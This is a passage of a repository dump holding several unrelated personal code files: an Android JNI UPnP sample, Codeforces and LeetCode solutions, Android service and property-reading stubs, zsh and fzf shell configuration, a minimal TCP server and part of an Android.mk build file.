%d\\n\", errCode);\n//\t\t} else {\n//\t\t\tTvCtrlPointHandleGetVar(\n//\t\t\t\tUpnpString_get_String(UpnpStateVarComplete_get_CtrlUrl(sv_event)),\n//\t\t\t\tUpnpString_get_String(UpnpStateVarComplete_get_StateVarName(sv_event)),\n//\t\t\t\tUpnpStateVarComplete_get_CurrentVal(sv_event));\n//\t\t}\n//\t\tbreak;\n//\t}\n\t/* GENA Stuff */\n\tcase UPNP_EVENT_RECEIVED: \n// {\n//\t\tUpnpEvent *e_event = (UpnpEvent *)Event;\n//\t\tTvCtrlPointHandleEvent(\n//\t\t\tUpnpEvent_get_SID_cstr(e_event),\n//\t\t\tUpnpEvent_get_EventKey(e_event),\n//\t\t\tUpnpEvent_get_ChangedVariables(e_event));\n//\t\tbreak;\n//\t}\n\tcase UPNP_EVENT_SUBSCRIBE_COMPLETE:\n\tcase UPNP_EVENT_UNSUBSCRIBE_COMPLETE:\n\tcase UPNP_EVENT_RENEWAL_COMPLETE: \n// {\n//\t\tUpnpEventSubscribe *es_event = (UpnpEventSubscribe *)Event;\n//\n//\t\terrCode = UpnpEventSubscribe_get_ErrCode(es_event);\n//\t\tif (errCode != UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\n//\t\t\t\t\"Error in Event Subscribe Callback -- %d\\n\", errCode);\n//\t\t} else {\n//\t\t\tTvCtrlPointHandleSubscribeUpdate(\n//\t\t\t\tUpnpString_get_String(UpnpEventSubscribe_get_PublisherUrl(es_event)),\n//\t\t\t\tUpnpString_get_String(UpnpEventSubscribe_get_SID(es_event)),\n//\t\t\t\tUpnpEventSubscribe_get_TimeOut(es_event));\n//\t\t}\n//\t\tbreak;\n//\t}\n\tcase UPNP_EVENT_AUTORENEWAL_FAILED:\n\tcase UPNP_EVENT_SUBSCRIPTION_EXPIRED: \n// {\n//\t\tUpnpEventSubscribe *es_event = (UpnpEventSubscribe *)Event;\n//\t\tint TimeOut = default_timeout;\n//\t\tUpnp_SID newSID;\n//\n//\t\terrCode = UpnpSubscribe(\n//\t\t\tctrlpt_handle,\n//\t\t\tUpnpString_get_String(UpnpEventSubscribe_get_PublisherUrl(es_event)),\n//\t\t\t&TimeOut,\n//\t\t\tnewSID);\n//\t\tif (errCode == UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\"Subscribed to EventURL with SID=%s\\n\", 
newSID);\n//\t\t\tTvCtrlPointHandleSubscribeUpdate(\n//\t\t\t\tUpnpString_get_String(UpnpEventSubscribe_get_PublisherUrl(es_event)),\n//\t\t\t\tnewSID,\n//\t\t\t\tTimeOut);\n//\t\t} else {\n//\t\t\tSampleUtil_Print(\"Error Subscribing to EventURL -- %d\\n\", errCode);\n//\t\t}\n//\t\tbreak;\n//\t}\n\t/* ignore these cases, since this is not a device */\n\tcase UPNP_EVENT_SUBSCRIPTION_REQUEST:\n\tcase UPNP_CONTROL_GET_VAR_REQUEST:\n\tcase UPNP_CONTROL_ACTION_REQUEST:\n\t\tbreak;\n\t}\n\n\treturn 0;\n}\n\nint Java_com_rmd_tpupnp_Main_startUpnp(JNIEnv* env, jobject thiz)\n{\n const char* ip_address = \"0.0.0.0\";\n const int port = 7080;\n int rc = UpnpInit(ip_address, port);\n LOGI(\"UpnpInit returns %s %d\", \"hello\", rc);\n if(UPNP_E_SUCCESS != rc)\n return 1;\n\n UpnpDevice_Handle device_handle = -1;\n// rc = UpnpRegisterRootDevice(\"http://pupnp.git.sourceforge.net/git/gitweb.cgi?p=pupnp/pupnp;a=blob_plain;f=upnp/sample/web/tvdevicedesc.xml;hb=HEAD\",\n// TvDeviceCallbackEventHandler, &device_handle, &device_handle);\n rc = UpnpRegisterClient(TvCtrlPointCallbackEventHandler, &device_handle, &device_handle);\n if(UPNP_E_SUCCESS != rc)\n return 1;\n rc = UpnpSearchAsync(device_handle, 5, \"urn:schemas-upnp-org:device:tvdevice:1\", NULL);\n\tif (UPNP_E_SUCCESS != rc) {\n\t\treturn 1;\n\t}\n\n\n// rc = UpnpSendAdvertisement(device_handle, 100 /* seconds */);\n if(UPNP_E_SUCCESS != rc)\n return 1;\n else\n return 0;\n}\n" }, { "alpha_fraction": 0.4216082692146301, "alphanum_fraction": 0.4505839943885803, "avg_line_length": 24.586206436157227, "blob_id": "d39fe9d588e4d4e3f006bb581ae57e952975c8dc", "content_id": "eaf34e6d329ecbeabaed454aa256462a387381b4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4469, "license_type": "permissive", "max_line_length": 192, "num_lines": 174, "path": "/algorithm/codeforces/2/2b.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://codeforces.com/problemset/problem/2/B\n *\n * B. The least round way\n * time limit per test5 seconds\n * memory limit per test64 megabytes\n * inputstandard input\n * outputstandard output\n * There is a square matrix n × n, consisting of non-negative integer numbers. You should find such a way on it that\n *\n * starts in the upper left cell of the matrix;\n * each following cell is to the right or down from the current cell;\n * the way ends in the bottom right cell.\n * Moreover, if we multiply together all the numbers along the way, the result should be the least \"round\". In other words, it should end in the least possible number of zeros.\n *\n * Input\n * The first line contains an integer number n (2 ≤ n ≤ 1000), n is the size of the matrix. Then follow n lines containing the matrix elements (non-negative integer numbers not exceeding 109).\n *\n * Output\n * In the first line print the least number of trailing zeros. 
In the second line print the correspondent way itself.\n *\n * Sample test(s)\n * input\n * 3\n * 1 2 3\n * 4 5 6\n * 7 8 9\n * output\n * 0\n * DDRR\n *\n *\n * Note: take care of the special case that there is 0 in the matrix.\n *\n */\n\n#include <iostream>\n\nusing namespace std;\nconst int MAX_SIZE = 1024;\n\nint gm[MAX_SIZE][MAX_SIZE], gm2[MAX_SIZE][MAX_SIZE], gm5[MAX_SIZE][MAX_SIZE];\nchar gd2[MAX_SIZE][MAX_SIZE], gd5[MAX_SIZE][MAX_SIZE];\nint zero_flag, zero_row, zero_col;\n\ntemplate<typename T>\nvoid print_matrix(T **m, int n) {\n for (int i = 0; i < n; ++i) {\n for (int j = 0; j < n; ++j) {\n cout << m[i][j] << ' ';\n }\n cout << endl;\n }\n}\n\nvoid get_number_of_factor(int **m, int **mo, int n, int p) {\n for (int i = 0; i < n; ++i) {\n for (int j = 0; j < n; ++j) {\n int x = m[i][j];\n if(zero_flag == 0 && x == 0) {\n zero_flag = 1;\n zero_row = i;\n zero_col = j;\n }\n while(x!=0 && x%p==0) {\n ++mo[i][j];\n x/=p;\n }\n }\n }\n}\n\nvoid dp(int **m, char **d, int n) {\n d[0][0] = ' ';\n for (int i = 1; i < n; ++i) {\n m[0][i] += m[0][i-1];\n m[i][0] += m[i-1][0];\n d[0][i] = 'R';\n d[i][0] = 'D';\n }\n\n for (int i = 1; i < n; ++i) {\n for (int j = 1; j < n; ++j) {\n if(m[i-1][j] >= m[i][j-1]) {\n m[i][j] += m[i][j-1];\n d[i][j] = 'R';\n }\n else {\n m[i][j] += m[i-1][j];\n d[i][j] = 'D';\n }\n }\n }\n}\n\nvoid output_path(char** d, int n) {\n int path_len = 2*(n-1)+1;\n char *path = new char[path_len];\n path[path_len-1] = '\\0';\n int i = n-1, j = n-1, k = path_len-2;\n while(k != -1) {\n path[k]=d[i][j];\n //cout << path_len << ' ' << i << ' ' << j << ' ' << k << ' ' << path[k] << endl;\n --k;\n if(d[i][j] == 'D')\n --i;\n else\n --j;\n }\n cout << path << endl;\n delete[] path;\n}\n\nint main(int argc, const char *argv[]) {\n int n = 0;\n int **m, **m2, **m5;\n char **d2, **d5;\n m = (int**)gm;\n m2 = (int**)gm2;\n m5 = (int**)gm5;\n d2 = (char**)gd2;\n d5 = (char**)gd5;\n cin >> n;\n m = new int*[n];\n m2 = new int*[n];\n m5 = new int*[n];\n d2 = new char*[n];\n d5 = new char*[n];\n for (int i = 0; i < n; ++i) {\n m[i] = new int[n];\n for (int j = 0; j < n; ++j) {\n cin >> m[i][j];\n }\n m2[i] = new int[n];\n m5[i] = new int[n];\n for (int j = 0; j < n; ++j) {\n m2[i][j] = 0;\n m5[i][j] = 0;\n }\n d2[i] = new char[n];\n d5[i] = new char[n];\n }\n\n get_number_of_factor(m, m2, n, 2);\n get_number_of_factor(m, m5, n, 5);\n\n dp(m2, d2, n);\n dp(m5, d5, n);\n\n int count2 = m2[n-1][n-1], count5 = m5[n-1][n-1];\n if(count2 < 1 || count5 < 1 || zero_flag == 0) {\n if(count2 > count5) {\n cout << count5 << endl;\n output_path(d5, n);\n }\n else {\n cout << count2 << endl;\n output_path(d2, n);\n }\n }\n else { // the path that contains 0 is the least one\n cout << 1 << endl;\n for(int i = 0; i < zero_row; ++i)\n cout << 'D';\n for(int i = 0; i < n-1; ++i)\n cout << 'R';\n for(int i = zero_row; i < n-1; ++i)\n cout << 'D';\n cout << endl;\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.42717087268829346, "alphanum_fraction": 0.450280100107193, "avg_line_length": 28.75, "blob_id": "7f90d7dd039ac2238447c0b97612c516578d7e12", "content_id": "20a7e90d54452ad11e9a312250f12b78d3898ea5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1428, "license_type": "permissive", "max_line_length": 166, "num_lines": 48, "path": "/algorithm/leetcode/4_median_of_two_sorted_arrays.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://leetcode.com/onlinejudge#question_4\n *\n * Median of 
Two Sorted ArraysMar 28 '112995 / 15696\n *\n * There are two sorted arrays A and B of size m and n respectively. Find the median of the two sorted arrays. The overall run time complexity should be O(log (m+n)).\n *\n */\n\n#include <iostream>\n\nusing namespace std;\n\nclass Solution {\n private:\n int findKthElement(int A[], int m, int B[], int n, int k) {\n int i = 0, j = 0, index = 0, result = 0;\n while(index++ < k) {\n cout << i << ' ' << j << ' ' << k << ' ' << index << endl;\n if(j >= n || (i < m && A[i] <= B[j])) {\n result = A[i++]; \n continue;\n }\n if(i >= m || (j < n && A[i] > B[j])) {\n result = B[j++];\n continue;\n }\n }\n return result;\n }\n\n public:\n double findMedianSortedArrays(int A[], int m, int B[], int n) {\n double ans = findKthElement(A, m, B, n, (m+n+1)/2);\n if((m+n)%2 == 0)\n ans = (ans+findKthElement(A, m, B, n, (m+n+2)/2))/2;\n return ans;\n }\n};\n\nint main(int argc, const char *argv[]) {\n int A[] = {};\n int B[] = {1, 4, 5, 6, 7};\n Solution s;\n cout << s.findMedianSortedArrays(A, sizeof(A)/sizeof(A[0]), B, sizeof(B)/sizeof(B[0])) << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.6300885081291199, "alphanum_fraction": 0.641887903213501, "avg_line_length": 21.873239517211914, "blob_id": "918b11c9e75db5f97f0f4ef879c854fb40f9b9c5", "content_id": "ac817c92c5ead120f3c6eb40935e81a03c8dac32", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1695, "license_type": "permissive", "max_line_length": 99, "num_lines": 71, "path": "/android/rpc-with-service/app2/src/com/rmd/app2/App2Service.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.app2;\r\n\r\nimport android.app.Service;\r\nimport android.content.Intent;\r\nimport android.os.IBinder;\r\nimport android.os.RemoteException;\r\nimport android.util.Log;\r\n\r\nimport com.rmd.ISvcController;\r\n\r\npublic class App2Service extends Service {\r\n\r\n\tIBinder svcController = null;\r\n\t\r\n\t@Override\r\n\tpublic IBinder onBind(Intent intent) {\r\n\t\tLog.v(\"App2\", \"App2 service onBind.\");\r\n\t\tif(null == svcController)\r\n\t\t{\r\n\t\t\tsvcController = new ISvcController.Stub() {\r\n\t\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void foo(String arg) throws RemoteException {\r\n\t\t\t\t\tLog.v(\"App2Service\", \"foo fired with argument: \" + arg);\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void bar(String arg) throws RemoteException {\r\n\t\t\t\t\tLog.v(\"App2Service\", \"bar fired with argument: \" + arg);\r\n\t\t\t\t}\r\n\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void func(int arg, String str) throws RemoteException {\r\n\t\t\t\t\tLog.v(\"App2Service\", \"func fired with argument: \" + str);\r\n\t\t\t\t}\r\n\t\t\t};\r\n\t\t}\r\n\t\tLog.v(\"App2\", \"App2 service onBind.\");\r\n\t\tLog.v(\"App2\", svcController.getClass().toString() + \"\\t hash code: \" + svcController.hashCode());\r\n\t\treturn svcController;\r\n\t}\r\n\r\n\tpublic void onCreate() {\r\n\t\tsuper.onCreate();\r\n\t\tLog.v(\"App2\", \"App2 service create.\");\r\n\t}\r\n\t@Override\r\n\tpublic void onDestroy() {\r\n\t\tsuper.onDestroy();\r\n\t\tLog.v(\"App2\", \"App2 service destroy.\");\r\n\t}\r\n\t\r\n\tpublic void onStart(Intent intent, int startId) {\r\n\t\t\r\n\t\tLog.v(\"App2\", \"App2 service start.\");\r\n\t};\r\n\t\r\n\t@Override\r\n\tpublic boolean onUnbind(Intent intent) {\r\n\t\tLog.v(\"App2\", \"App2 service onUnbind.\");\r\n\t\r\n\t\treturn 
super.onUnbind(intent);\r\n\t}\r\n\t\r\n\t@Override\r\n\tpublic void onRebind(Intent intent) {\r\n\t\tLog.v(\"App2\", \"App2 service rebind.\");\r\n\t\r\n\t\tsuper.onRebind(intent);\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.35041549801826477, "alphanum_fraction": 0.3739612102508545, "avg_line_length": 25.740739822387695, "blob_id": "d34faac89c29fadb9dc3a09c9bdbd012b5485ede", "content_id": "d16d905102f7cb3b05a57edd3f1167c93315835d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 722, "license_type": "permissive", "max_line_length": 88, "num_lines": 27, "path": "/android/native_read_property/jni/readproperty.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: rmd.c\n// \n// Description: \n// \n// Version: 1.0\n// Created: 12/21/2010 08:55:57 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t<sys/system_properties.h>\n\nint main ( int argc, char *argv[] )\n{\n char value[PROP_VALUE_MAX];\n const char* name = \"media.stagefright.enable-http\";\n __system_property_get(name, value);\n printf(\"%s: %s\\n\", name, value);\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.7240875959396362, "alphanum_fraction": 0.7262773513793945, "avg_line_length": 36.013511657714844, "blob_id": "914ea635dd965445c44ac3f8b10d0d6eb4ebc404", "content_id": "58e4734070cd8560c56be76207be61db5c9abccd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2740, "license_type": "permissive", "max_line_length": 167, "num_lines": 74, "path": "/settings/ubuntu_home/.zshrc", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "# Path to your oh-my-zsh configuration.\nZSH=$HOME/.oh-my-zsh\n\n# Set name of the theme to load.\n# Look in ~/.oh-my-zsh/themes/\n# Optionally, if you set this to \"random\", it'll load a random theme each\n# time that oh-my-zsh is loaded.\nZSH_THEME=\"gentoo\"\n\n# Example aliases\n# alias zshconfig=\"mate ~/.zshrc\"\n# alias ohmyzsh=\"mate ~/.oh-my-zsh\"\n\n# Set to this to use case-sensitive completion\n# CASE_SENSITIVE=\"true\"\n\n# Uncomment this to disable bi-weekly auto-update checks\nDISABLE_AUTO_UPDATE=\"true\"\n\n# Uncomment to change how often before auto-updates occur? (in days)\n# export UPDATE_ZSH_DAYS=13\n\n# Uncomment following line if you want to disable colors in ls\n# DISABLE_LS_COLORS=\"true\"\n\n# Uncomment following line if you want to disable autosetting terminal title.\n# DISABLE_AUTO_TITLE=\"true\"\n\n# Uncomment following line if you want to disable command autocorrection\n# DISABLE_CORRECTION=\"true\"\n\n# Uncomment following line if you want red dots to be displayed while waiting for completion\n# COMPLETION_WAITING_DOTS=\"true\"\n\n# Uncomment following line if you want to disable marking untracked files under\n# VCS as dirty. 
This makes repository status check for large repositories much,\n# much faster.\n# DISABLE_UNTRACKED_FILES_DIRTY=\"true\"\n\n# config Ctrl+U to delete from cursor to the beginning of line, to mimic bash behavior\nbindkey \\^u backward-kill-line\n\n# configuration for zsh-completions\nfpath=(~/.oh-my-zsh/custom/plugins/zsh-completions/src/ $fpath)\n\n# Which plugins would you like to load? (plugins can be found in ~/.oh-my-zsh/plugins/*)\n# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/\n# Example format: plugins=(rails git textmate ruby lighthouse)\nplugins=(git fasd tmux zsh-syntax-highlighting golang repo docker pip git-extras colored-man kubectl)\nexport ZSH_TMUX_AUTOSTART=true\nexport ZSH_TMUX_AUTOSTART_ONCE=true\nexport ZSH_TMUX_AUTOCONNECT=false\nexport ZSH_TMUX_AUTOQUIT=false\n\nsource $ZSH/oh-my-zsh.sh\n\n# Customize to your needs...\n#PROMPT='%(!.%{$fg_bold[red]%}.%{$fg_bold[green]%}%n@)%m%{$fg_bold[blue]%}:%1d $(git_prompt_info)%_$(prompt_char)%{$reset_color%} '\nPROMPT='%(!.%{$fg_bold[red]%}.%{$fg_bold[green]%}%n@)%m%{$fg_bold[blue]%}:%1d %{$fg_bold[magenta]%}$(git_prompt_info)%{$fg_bold[blue]%}$(prompt_char)%{$reset_color%} '\nif [ -f ~/.bash_aliases ]; then\n source ~/.bash_aliases\nfi\n\n# my own git_prompt_info function that does parse git directory status\nfunction git_prompt_info() {\n ref=$(command git symbolic-ref HEAD 2> /dev/null) || \\\n ref=$(command git rev-parse --short HEAD 2> /dev/null) || return\n echo \"$ZSH_THEME_GIT_PROMPT_PREFIX${ref#refs/heads/}$ZSH_THEME_GIT_PROMPT_SUFFIX\"\n}\n\n# setup machine specific environment variables sotred in .env\nif [ -f ~/.env ] ; then\n . ~/.env\nfi\n\n" }, { "alpha_fraction": 0.5948616862297058, "alphanum_fraction": 0.6027668118476868, "avg_line_length": 19.08333396911621, "blob_id": "fe2ca23e30b6073e4458318e205b477beeee9589", "content_id": "cacbb02b500e24cdd496e79a7441042e58c2c984", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 506, "license_type": "permissive", "max_line_length": 65, "num_lines": 24, "path": "/wince/protobuf_for_ce/ce_port/errno.h", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/***\r\n*errno.h - system wide error numbers (set by system calls)\r\n*\r\n* Copyright (c) Microsoft Corporation. All rights reserved.\r\n*\r\n*Purpose:\r\n* This file defines the system-wide error numbers (set by\r\n* system calls). Conforms to the XENIX standard. 
Extended\r\n* for compatibility with Uniforum standard.\r\n* [System V]\r\n*\r\n* [Public] \r\n*\r\n****/\r\n\r\n#if _MSC_VER > 1000\r\n#pragma once\r\n#endif\r\n\r\n#ifndef _INC_ERRNO\r\n#define _INC_ERRNO\r\n\r\n\r\n#endif /* _INC_ERRNO */\r\n" }, { "alpha_fraction": 0.4329608976840973, "alphanum_fraction": 0.455307275056839, "avg_line_length": 22.09677505493164, "blob_id": "9fdfa144bb73b8f884ff9a79632c5f8f1a6e62b7", "content_id": "65781fa68a07189dc4ecc2d8e36290ade9ce5428", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1432, "license_type": "permissive", "max_line_length": 88, "num_lines": 62, "path": "/networking/simplest_tcp_server_on_new_thread.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: simplest_tcp_server_on_new_thread.cpp\n// \n// Description: \n// \n// Version: 1.0\n// Created: 10/27/2010 09:39:56 AM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t<string.h>\n#include\t<iostream>\n#include\t<netinet/in.h>\n#include\t<sys/socket.h>\n#include\t<pthread.h>\n\nusing namespace std;\n\nstatic void* proc(void* para)\n{\n int sock = *((int*)para);\n if(0 > listen(sock, 1000))\n cout << \"error listen\" << endl;\n while(1)\n {\n accept(sock, NULL, NULL);\n cout << \"accept \" << endl;\n }\n return NULL;\n}\t\t// ----- end of function proc -----\n\nint main ( int argc, char *argv[] )\n{\n int sock = socket(PF_INET, SOCK_STREAM, 0);\n struct sockaddr_in addr;\n\n memset(&addr, 0, sizeof(addr));\n addr.sin_family = AF_INET;\n addr.sin_addr.s_addr = htonl(INADDR_ANY);\n addr.sin_port = htons(8989);\n\n if(0 > bind(sock, (struct sockaddr*)&addr, sizeof(addr)))\n {\n cout << \"error bind\" << endl;\n return 1;\n }\n pthread_t th;\n pthread_create(&th, NULL, proc, &sock);\n while(1)\n {\n continue;\n }\n\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.5275074243545532, "alphanum_fraction": 0.5359712243080139, "avg_line_length": 29.882352828979492, "blob_id": "041af03d66ca7a47983af803b831362d7e859ec2", "content_id": "23aa417dd97f9420a14084c4649f6f56dc6f1837", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4726, "license_type": "permissive", "max_line_length": 89, "num_lines": 153, "path": "/settings/ubuntu_home/.fzf.zsh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "# Setup fzf\n# ---------\nif [[ ! \"$PATH\" == *$HOME/.fzf/bin* ]]; then\n export PATH=\"$PATH:$HOME/.fzf/bin\"\nfi\n\n# Man path\n# --------\nif [[ ! 
\"$MANPATH\" == *$HOME/.fzf/man* && -d \"$HOME/.fzf/man\" ]]; then\n export MANPATH=\"$MANPATH:$HOME/.fzf/man\"\nfi\n\n# Auto-completion\n# ---------------\n[[ $- == *i* ]] && source \"$HOME/.fzf/shell/completion.zsh\" 2> /dev/null\n\n# Key bindings\n# ------------\nsource \"$HOME/.fzf/shell/key-bindings.zsh\"\n\n\n# fgit-log - git commit browser (enter for show, ctrl-d for diff)\nfgit-log() {\n local out shas sha q k\n while out=$(\n git log --graph --color=always \\\n --format=\"%C(auto)%h%d %s %C(black)%C(bold)%cr\" \"$@\" |\n fzf --ansi --multi --no-sort --reverse --query=\"$q\" \\\n --print-query --expect=ctrl-d); do\n q=$(head -1 <<< \"$out\")\n k=$(head -2 <<< \"$out\" | tail -1)\n shas=$(sed '1,2d;s/^[^a-z0-9]*//;/^$/d' <<< \"$out\" | awk '{print $1}')\n [ -z \"$shas\" ] && continue\n if [ \"$k\" = ctrl-d ]; then\n git diff --color=always $shas | less -R\n else\n for sha in $shas; do\n git show --color=always $sha | less -R\n done\n fi\n done\n}\n\n# fgit-reflog - checkout git reflog\nfgit-reflog() {\n local reflogs sha\n reflogs=$(git reflog) &&\n sha=$(echo \"$reflogs\" | fzf +s +m -e --reverse ) &&\n git checkout $(echo \"$sha\" | sed \"s/ .*//\")\n}\n\n# fgit-branch - checkout git branch (including remote branches)\nfgit-branch() {\n local branches branch\n branches=$(git branch --all | grep -v HEAD) &&\n branch=$(echo \"$branches\" |\n fzf --reverse -d $(( 2 + $(wc -l <<< \"$branches\") )) +m) &&\n git checkout $(echo \"$branch\" | sed \"s/.* //\" | sed \"s#remotes/[^/]*/##\")\n}\n\n# fgit-switch - checkout git\nfgit-tag() {\n local tags target\n tags=$(\n git tag | awk '{print \"\\x1b[31;1mtag\\x1b[m\\t\" $1}') || return\n target=$(\n (echo \"$tags\"; echo \"$branches\") |\n fzf --reverse --no-hscroll --ansi +m -d \"\\t\" -n 2) || return\n git checkout $(echo \"$target\" | awk '{print $2}')\n}\n\n# fgit-show - git commit browser\nfgit-show() {\n git log --graph --color=always \\\n --format=\"%C(auto)%h%d %s %C(black)%C(bold)%cr\" \"$@\" |\n fzf --ansi --no-sort --reverse --tiebreak=index --bind=ctrl-s:toggle-sort \\\n --bind \"ctrl-m:execute:\n (grep -o '[a-f0-9]\\{7\\}' | head -1 |\n xargs -I % sh -c 'git show --color=always % | less -R') << 'FZF-EOF'\n {}\n FZF-EOF\"\n}\n\n# fgit-stash - easier way to deal with stashes\n# type fstash to get a list of your stashes\n# enter shows you the contents of the stash\n# ctrl-d shows a diff of the stash against your current HEAD\n# ctrl-b checks the stash out as a branch, for easier merging\nfgit-stash() {\n local out q k sha\n while out=$(\n git stash list --pretty=\"%C(yellow)%h %>(14)%Cgreen%cr %C(blue)%gs\" |\n fzf --ansi --reverse --no-sort --query=\"$q\" --print-query \\\n --expect=ctrl-d,ctrl-b);\n do\n mapfile -t out <<< \"$out\"\n q=\"${out[0]}\"\n k=\"${out[1]}\"\n sha=\"${out[-1]}\"\n sha=\"${sha%% *}\"\n [[ -z \"$sha\" ]] && continue\n if [[ \"$k\" == 'ctrl-d' ]]; then\n git diff $sha\n elif [[ \"$k\" == 'ctrl-b' ]]; then\n git stash branch \"stash-$sha\" $sha\n break;\n else\n git stash show -p $sha\n fi\n done\n}\n\n# Modified version where you can press\n# - CTRL-O to open with `open` command,\n# - CTRL-E or Enter key to open with the $EDITOR\nfo() {\n local out file key\n out=$(fzf --query=\"$1\" --exit-0 --expect=ctrl-o,ctrl-e)\n key=$(head -1 <<< \"$out\")\n file=$(head -2 <<< \"$out\" | tail -1)\n if [ -n \"$file\" ]; then\n [ \"$key\" = ctrl-o ] && open \"$file\" || ${EDITOR:-vim} \"$file\"\n fi\n}\n\n# fs [FUZZY PATTERN] - Select selected tmux session\n# - Bypass fuzzy finder if there's only one match 
(--select-1)\n# - Exit if there's no match (--exit-0)\nfs() {\n local session\n session=$(tmux list-sessions -F \"#{session_name}\" | \\\n fzf --query=\"$1\" --select-1 --exit-0) &&\n tmux switch-client -t \"$session\"\n}\n\n# ftpane - switch pane\nftpane () {\n local panes current_window target target_window target_pane\n panes=$(tmux list-panes -s -F '#I:#P - #{pane_current_path} #{pane_current_command}')\n current_window=$(tmux display-message -p '#I')\n\n target=$(echo \"$panes\" | fzf-tmux) || return\n\n target_window=$(echo $target | awk 'BEGIN{FS=\":|-\"} {print$1}')\n target_pane=$(echo $target | awk 'BEGIN{FS=\":|-\"} {print$2}' | cut -c 1)\n\n if [[ $current_window -eq $target_window ]]; then\n tmux select-pane -t ${target_window}.${target_pane}\n else\n tmux select-pane -t ${target_window}.${target_pane} &&\n tmux select-window -t $target_window\n fi\n}\n\n" }, { "alpha_fraction": 0.6883935928344727, "alphanum_fraction": 0.7123633027076721, "avg_line_length": 29.10126495361328, "blob_id": "716306ac8c111634bce29cafdfdfe93c0d86bbc2", "content_id": "f3c76e86ab4cb3d877ceb1696a7100743d176459", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 2378, "license_type": "permissive", "max_line_length": 59, "num_lines": 79, "path": "/android/exosip_sample/libosip/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\t\tsrc/osipparser2/osip_accept.c \\\n\t\tsrc/osipparser2/osip_proxy_authenticate.c \\\n\t\tsrc/osipparser2/osip_parser_cfg.c \\\n\t\tsrc/osipparser2/osip_mime_version.c \\\n\t\tsrc/osipparser2/osip_uri.c \\\n\t\tsrc/osipparser2/osip_call_id.c \\\n\t\tsrc/osipparser2/osip_contact.c \\\n\t\tsrc/osipparser2/osip_header.c \\\n\t\tsrc/osipparser2/osip_list.c \\\n\t\tsrc/osipparser2/osip_authentication_info.c \\\n\t\tsrc/osipparser2/osip_cseq.c \\\n\t\tsrc/osipparser2/osip_message.c \\\n\t\tsrc/osipparser2/osip_record_route.c \\\n\t\tsrc/osipparser2/osip_authorization.c \\\n\t\tsrc/osipparser2/sdp_accessor.c \\\n\t\tsrc/osipparser2/osip_accept_language.c \\\n\t\tsrc/osipparser2/osip_via.c \\\n\t\tsrc/osipparser2/osip_allow.c \\\n\t\tsrc/osipparser2/osip_call_info.c \\\n\t\tsrc/osipparser2/osip_proxy_authentication_info.c \\\n\t\tsrc/osipparser2/osip_proxy_authorization.c \\\n\t\tsrc/osipparser2/sdp_message.c \\\n\t\tsrc/osipparser2/osip_accept_encoding.c \\\n\t\tsrc/osipparser2/osip_content_encoding.c \\\n\t\tsrc/osipparser2/osip_to.c \\\n\t\tsrc/osipparser2/osip_content_disposition.c \\\n\t\tsrc/osipparser2/osip_message_to_str.c \\\n\t\tsrc/osipparser2/osip_www_authenticate.c \\\n\t\tsrc/osipparser2/osip_error_info.c \\\n\t\tsrc/osipparser2/osip_body.c \\\n\t\tsrc/osipparser2/osip_content_length.c \\\n\t\tsrc/osipparser2/osip_from.c \\\n\t\tsrc/osipparser2/osip_alert_info.c \\\n\t\tsrc/osipparser2/osip_message_parse.c \\\n\t\tsrc/osipparser2/osip_content_type.c \\\n\t\tsrc/osipparser2/osip_port.c \\\n\t\tsrc/osipparser2/osip_md5c.c \\\n\t\tsrc/osipparser2/osip_route.c \\\n\t\tsrc/osip2/osip_transaction.c \\\n\t\tsrc/osip2/osip_dialog.c \\\n\t\tsrc/osip2/osip_event.c \\\n\t\tsrc/osip2/nict_fsm.c \\\n\t\tsrc/osip2/port_thread.c \\\n\t\tsrc/osip2/nict.c \\\n\t\tsrc/osip2/nist.c \\\n\t\tsrc/osip2/port_sema.c \\\n\t\tsrc/osip2/ict_fsm.c \\\n\t\tsrc/osip2/ict.c 